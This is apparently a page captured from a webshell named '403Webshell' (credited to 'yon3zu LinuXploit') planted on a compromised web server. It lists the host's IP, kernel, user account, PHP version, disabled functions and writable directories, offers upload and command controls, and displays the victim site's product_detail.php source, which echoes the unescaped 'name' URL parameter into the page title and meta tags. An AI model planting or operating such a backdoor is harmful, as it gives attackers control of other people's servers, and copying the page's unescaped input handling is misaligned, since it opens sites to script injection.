403Webshell
Server IP : 103.233.193.20  /  Your IP : 216.73.216.169
Web Server : Apache/2
System : Linux host1.itclever.com 4.18.0-553.16.1.el8_10.x86_64 #1 SMP Thu Aug 8 17:47:08 UTC 2024 x86_64
User : oriscomadm ( 1120)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
MySQL : ON |  cURL : ON |  WGET : OFF |  Perl : OFF |  Python : OFF |  Sudo : OFF |  Pkexec : OFF
Directory :  /home/oriscomadm/domains/oriscom.com/private_html/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /home/oriscomadm/domains/oriscom.com/private_html/product_detail.php
<?php
require"include/db.php";
require"include/function.php";
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta name="viewport" content="initial-scale=1.0">
<title><?php echo $_GET['name']?>  | <?php echo $Rs['facebook']?></title>
<meta name="keywords" content="<?php echo $_GET['name']?>,<?php echo $Rs['facebook']?>" />
<meta name="description" content="<?php echo $Rs['facebook']?>" />
<link rel="stylesheet" href="css/common.css" type="text/css" charset="utf-8" />
<link rel="stylesheet" href="css/style.css" type="text/css" charset="utf-8" />
<link rel="stylesheet" href="css/iview.css" />
<link rel="stylesheet" href="css/style_slider.css" />
<link rel="stylesheet" href="css/superfish.css" media="screen">

<link rel="icon" type="image/png" sizes="16x16"  href="/favicons/favicon-16x16.png">
<meta name="msapplication-TileColor" content="#ffffff">
<meta name="theme-color" content="#ffffff">

<script src="js/jquery-latest.min.js" type="text/javascript"></script>
<script type="text/javascript" src="js/raphael-min.js"></script>
<script type="text/javascript" src="js/jquery.easing.js"></script>
<script src="js/iview.js"></script>
<script src="js/css3-mediaqueries.js"></script>
<script src="js/hoverIntent.js"></script>
<script src="js/superfish.js"></script>
<script>
			$(document).ready(function(){
				
				// initialise plugin
				var example = $('#example').superfish({
					//add options here if required
				});

				// buttons to demonstrate Superfish's public methods
				$('.destroy').on('click', function(){
					example.superfish('destroy');
				});

				$('.init').on('click', function(){
					example.superfish();
				});

				$('.open').on('click', function(){
					example.children('li:first').superfish('show');
				});

				$('.close').on('click', function(){
					example.children('li:first').superfish('hide');
				});
			});
		</script>
<script>
	$(function(){
		$( "#menu" ).toggle(function() {
 			 $('ul.menulist').slideDown(500);
		}, function() {
  			$('ul.menulist').slideUp(500);
		});
		
		$('#nav > li > a').click(function(){
			if ($(this).attr('class') != 'active'){
			  $('#nav li ul').slideUp();
			  $(this).next().slideToggle();
			  $('#nav li a').removeClass('active');
			  $(this).addClass('active');
			}
	  	});
		$('ul.second > li > a').click(function(){
			if ($(this).attr('class') != 'active'){
			  $('ul.second li ul').slideUp();
			  $(this).next().slideToggle();
			  $('ul.second li a').removeClass('active');
			  $(this).addClass('active');
			}
	  	});
		$('ul.third > li > a').click(function(){
			if ($(this).attr('class') != 'active'){
			  $('ul.third li ul').slideUp();
			  $(this).next().slideToggle();
			  $('ul.third li a').removeClass('active');
			  $(this).addClass('active');
			}
	  	});
		$('ul.fourth > li > a').click(function(){
			if ($(this).attr('class') != 'active'){
			  $('ul.fourth li ul').slideUp();
			  $(this).next().slideToggle();
			  $('ul.fourth li a').removeClass('active');
			  $(this).addClass('active');
			}
	  	});
		$('ul.fifth > li > a').click(function(){
			if ($(this).attr('class') != 'active'){
			  $('ul.fifth li ul').slideUp();
			  $(this).next().slideToggle();
			  $('ul.fifth li a').removeClass('active');
			  $(this).addClass('active');
			}
	  	});
		
	});
	
</script>
</head>

<body>
<?php require("include/header.php"); ?>
<?php 
$id=$_GET['id'];
if($_GET['l']==3){
	$ResultProduct_III = $Class->selectProduct_III(null,$id);
	$Topicth = $ResultProduct_III[0]['nameth'];
	$Topicen = $ResultProduct_III[0]['nameen'];
	$Textth = $ResultProduct_III[0]['detailth'];
	$Texten = $ResultProduct_III[0]['detailen'];
}

if($_GET['l']==4){
	$ResultProduct_IV = $Class->selectProduct_IV(null,$id);
	$Topicth = $ResultProduct_IV[0]['nameth'];
	$Topicen = $ResultProduct_IV[0]['nameen'];
	$Textth = $ResultProduct_IV[0]['detailth'];
	$Texten = $ResultProduct_IV[0]['detailen'];
}

if($_GET['l']==5){
	$ResultProduct_V = $Class->selectProduct_V(null,$id);
	$Topicth = $ResultProduct_V[0]['nameth'];
	$Topicen = $ResultProduct_V[0]['nameen'];
	$Textth = $ResultProduct_V[0]['detailth'];
	$Texten = $ResultProduct_V[0]['detailen'];
}
?>

<div class="bg_wrapper">
    <div class="wrapper_content">
        <div class="box_content">
            <h2><label class="thh"><?php echo $Topicth?></label><label class="enn" style="display:none;"><?php echo $Topicen?></label></h2>
            <div class="content">
            	<label class="thh"><?php echo $Textth?></label><label class="enn" style="display:none;"><?php echo $Texten?></label>
            </div>
        </div>
    </div>
</div>


<div class="clear" style="border-bottom:1px solid #ddd; padding-bottom:20px;"></div>
<?php require("include/footer.php");?>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit